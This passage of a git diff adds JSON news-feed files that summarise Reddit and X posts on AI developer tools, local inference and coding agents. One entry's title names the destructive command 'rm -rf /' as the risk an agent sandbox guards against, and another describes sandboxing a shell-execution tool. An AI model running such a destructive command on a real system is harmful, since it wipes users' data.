# What works now * CLI command: \\`vramsuite doctor\\` * Public Python API: \\`import vramsuite\\` * Structured doctor API: \\`run\\_doctor()\\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \\`ctypes\\` * Driver-level total/free/used VRAM without requiring PyTorch * \\`.vramcard\\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \\`--estimate-mb\\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50…", + "category": "creative_tools" + }, + { + "title": "Claude working autonomously", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T11:21:02.000Z", + "summary": "Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? 
I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system", + "category": "ai_tools" + }, + { + "title": "Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks", + "url": "https://x.com/alessandro_a0/status/2058278886572433812", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-24T18:23:11.433Z", + "summary": "A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement.", + "category": "ai_tools" + }, + { + "title": "Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-24T12:41:07.000Z", + "summary": "At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. 
Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()…", + "category": "ai_research" + }, + { + "title": "PapersWithCode new features - week 1 [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T12:31:12.000Z", + "summary": "Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \\- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. 
https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \\- Su…", + "category": "ai_research" + }, + { + "title": "Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-24T11:31:24.000Z", + "summary": "Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\\_k\\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \\- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late…", + "category": "ai_models" + }, + { + "title": "How I do use the recent llama.cpp native tools to do web rag a.k.a. 
web_fetch (or anything else for the matter) directly from inside the llama-server's webui", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-24T11:02:32.000Z", + "summary": "As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\\_shell\\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. 
\"virtual machine agent smith\") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it…", + "category": "ai_models" + }, + { + "title": "48 frontends for Comfy!", + "url": "https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T04:40:33.000Z", + "summary": "This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. 
ComfyUI\\_bsk\\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.…", + "category": "creative_tools" + }, + { + "title": "🚀 Skills for small businesses, officially released by Anthropic", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T11:03:28.000Z", + "summary": "Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \\~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. 
This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins", + "category": "ai_tools" + }, + { + "title": "Claude code - Cultivate your context window to get the max out of your tokens", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T07:27:11.000Z", + "summary": "Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. 
It loads automatically into every Claude Code session via \\~/.claude/[CLAUDE.md](http://c…", + "category": "ai_tools" + }, + { + "title": "LongCat-Video-Avatar 1.5 Release", + "url": "https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-24T07:52:12.000Z", + "summary": "HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. 
* 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio…", + "category": "creative_tools" + }, + { + "title": "Claude records demo videos for me now", + "url": "https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.62, + "date": "2026-05-24T18:38:15.000Z", + "summary": "I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. 
Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill)", + "category": "ai_tools" + }, + { + "title": "hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-24T22:21:21.000Z", + "summary": "A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. 
### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill (\"prompt processing\") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04…", + "category": "ai_models" + }, + { + "title": "MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-24T22:17:41.000Z", + "summary": "I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). 
I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :)", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-25.json b/data/news-feed-2026-05-25.json new file mode 100644 index 0000000..23b23d4 --- /dev/null +++ b/data/news-feed-2026-05-25.json @@ -0,0 +1,279 @@ +{ + "generated": "2026-06-05T00:44:43.508Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-25", + "article_count": 15, + "archived_story_count": 588, + "articles": [ + { + "title": "I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-25T07:14:17.000Z", + "summary": "I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. 
So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish", + "category": "ai_models" + }, + { + "title": "I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task", + "url": "https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-25T13:37:21.000Z", + "summary": "I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. 
This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract…", + "category": "ai_tools" + }, + { + "title": "Workbench Launches Open Source BullMQ Dashboard For Node Backends", + "url": "https://x.com/pontusab/status/2058588422001029549", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-25T01:21:33.840Z", + "summary": "Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends.", + "category": "ai_tools" + }, + { + "title": "Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-25T20:34:06.000Z", + "summary": "Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. 
I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice!", + "category": "ai_tools" + }, + { + "title": "I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T20:52:25.000Z", + "summary": "I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD (\"What Are You Doing?\") is a Claude Code skill. You type `/wayd` and either post a short \"vibe\" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 
8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons…", + "category": "ai_tools" + }, + { + "title": "Is AI inference platform really that saturated now? [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T17:52:10.000Z", + "summary": "I’m thinking of expanding an on-device inference SDk into a full blown AI inference platform and seeing more and more inference platform popping out. Been talking with a VC from Seattle/NY. Is this space really that saturated?", + "category": "ai_research" + }, + { + "title": "Reconstructing the agent methodology: Decoupling decision-making and execution - open source [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tnfxsc/reconstructing_the_agent_methodology_decoupling/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T17:29:28.000Z", + "summary": "I’ve been thinking about a problem in current agent systems: Most agents are becoming very good at execution, but the decision layer before execution is still unclear. Coding agents, research agents, tool loops, sandboxes, workflows, and harnesses are all improving quickly. 
Once a human gives an intent, agents can often do a lot of useful work. But the higher-level question is still usually left to the user: What should happen next, and why? I’ve been exploring this idea through an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. It is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - whether execution needs approval - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but it can already be installed, configured with an LLM provider, run in the terminal, inspect Decision Cards, and hand off…", + "category": "ai_research" + }, + { + "title": "I’m building an open-source decision layer above AI agents [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tndi8y/im_building_an_opensource_decision_layer_above_ai/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T16:03:36.000Z", + "summary": "Hi everyone, I’m Jia, the creator of Spice. I’ve been working on an open-source project called Spice. The simplest way to describe it is: Spice is a decision layer above agents. Most agent systems today are very focused on execution, They are getting better at doing tasks after a human gives them an intent. But the higher-level question is still usually left to the user: What should happen next, and why? That is the layer I want Spice to explore. Spice is not trying to replace execution agents. Tools like Claude Code, Codex, Hermes, or other agents can still do the actual work. 
Instead, Spice sits before execution and tries to make the decision process explicit: - what was observed - what options were considered - why one option was selected - what trade-offs were rejected - what happened afterward - how that outcome should affect the next decision The current runtime is still early, but you can already install it, set up an LLM provider, run it in the terminal, inspect Decision Cards, and hand off approved execution to external agents. My goal is to make agent behavior less of a black box. Instead of only seeing the final result of an agent task, I want to preserve the reasoning…", + "category": "ai_research" + }, + { + "title": "I built a computer use sandbox framework for codex on headless linux. GPU passthrough, computer use, and sudo access for codex all work. It's the perfect dev sandbox to allow full auto work while minimizing the \"rm -rf /\" risk", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn3i55/i_built_a_computer_use_sandbox_framework_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-25T09:01:19.000Z", + "summary": "I've been working with agents for months now, and I haven't found a sandbox environment that \"just works\" so I built it! My requirements were as follows: 1. Agent is unable to destroy my host OS but able to install software and run sudo commands 2. Agent is able to browse the web autonomously and validate the UI it creates 3. GPU access works (even on DGX spark which cant pass through to 4. Docker works 5. Persistent environment I can setup once, log into my internet accounts I want the agent to access, copy in my .env files, install custom software etc. 6. Support multiple parallel browser use / development sessions concurrently 7. 
Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO…", + "category": "ai_models" + }, + { + "title": "We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T08:16:51.000Z", + "summary": "Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. 
Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case.", + "category": "ai_models" + }, + { + "title": "xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss", + "url": "https://www.digg.com/ai/hlcz47lw", + "source": "Digg AI", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T06:00:09.947Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-25T04:19:50.000Z", + "summary": "Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. 
